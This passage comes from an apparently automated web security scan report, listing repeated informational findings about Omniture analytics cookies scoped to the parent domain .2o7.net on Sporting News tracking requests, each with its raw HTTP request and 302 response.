Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www358
Content-Length: 0
Content-Type: text/plain
Connection: close


16.113. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s43049185345880

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43049185345880 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www286
Content-Length: 0
Content-Type: text/plain
Connection: close


16.114. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s4310452240519

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4310452240519 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www339
Content-Length: 0
Content-Type: text/plain
Connection: close


16.115. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s43305702756624

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43305702756624 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close


16.116. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s43513301596976

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43513301596976 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www320
Content-Length: 0
Content-Type: text/plain
Connection: close


16.117. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s43547210348770

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43547210348770 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www277
Content-Length: 0
Content-Type: text/plain
Connection: close


16.118. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s4364950429648

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4364950429648 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www431
Content-Length: 0
Content-Type: text/plain
Connection: close


16.119. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s43829343500547

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43829343500547 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www37
Content-Length: 0
Content-Type: text/plain
Connection: close


16.120. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s4407522239256

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4407522239256 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www25
Content-Length: 0
Content-Type: text/plain
Connection: close


16.121. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s4419304328970

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4419304328970 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www280
Content-Length: 0
Content-Type: text/plain
Connection: close


16.122. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s4424447611439

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4424447611439 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www378
Content-Length: 0
Content-Type: text/plain
Connection: close


16.123. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s44325433499179

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44325433499179 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
